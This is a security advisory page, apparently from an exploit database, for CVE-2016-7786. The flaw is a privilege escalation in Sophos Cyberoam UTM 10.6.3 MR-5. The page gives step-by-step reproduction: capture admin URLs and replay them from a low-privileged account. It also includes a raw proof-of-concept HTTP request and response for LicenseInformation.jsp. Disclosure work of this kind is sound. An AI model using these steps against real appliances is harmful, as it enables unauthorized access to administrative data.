Sophos Cyberoam UTM CR25iNG 10.6.3 MR-5 Direct Object Reference

Credit: Frogy
Risk: High
Local: No
Remote: Yes
CWE: CWE-264

CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Sophos Cyberoam UTM - Privilege Escalation # Date: 31/08/2016 # Exploit Author: Chintan Gurjar (Frogy) # Vendor Homepage: # Software Link: # Version: Cyberoam CR25iNG - 10.6.3 MR-5 # CVE : CVE-2016-7786 # Category : Webapps # CVSS Score: 9.3 Description =========== A vulnerability, which was classified as critical, has been found in Sophos Cyberoam UTM CR25iNG 10.6.3 MR-5. This issue affects an unknown function of the file Licenseinformation.jsp of the component Access Restriction. The manipulation with an unknown input leads to a privilege escalation vulnerability. Using CWE to declare the problem leads to CWE-264. Impacted are confidentiality, integrity, and availability. The weakness was released 04/07/2017. The advisory is shared for download at The identification of this vulnerability is CVE-2016-7786 since 09/09/2016. The attack may be initiated remotely. The successful exploitation needs a single authentication. Technical details of the vulnerability are known. Upgrading to version 10.6.5 eliminates this vulnerability. Steps to reproduce =================== 1. Login with admin user account. 2. Navigate to the dashboard and observe all GET URLs through burp proxy. Save URLs. 3. Logout and login with a low privileged user account who does not have even read/write/execution permission. 4. Access saved admin functionality URLs with a low privileged user account. 5. Access the admin information from the user account. Video Demonstration ==================== PoC =============== Request: GET /corporate/webpages/dashboard/LicenseInformation.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;1=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: Cookie: JSESSIONID=120g9lzj467ivba7uvbf9ej73 Connection: close Response: HTTP/1.1 200 OK Date: Wed, 31 Aug 2016 06:59:56 GMT X-Frame-Options: SAMEORIGIN Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=2592000 Expires: Fri, 30 Sep 2016 06:59:56 GMT Vary: Accept-Encoding Content-Length: 1828 Connection: Close ... <table width="100%" cellpading="1" cellspacing="1"> <tr> <td class="tableheader_gadget" align="center"><label id='Language.Time'></label></td> <td class="tableheader_gadget" align="center"><label id='Language.User'></label></td> ... Affected URLs =============== ...Many others... References ===============

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top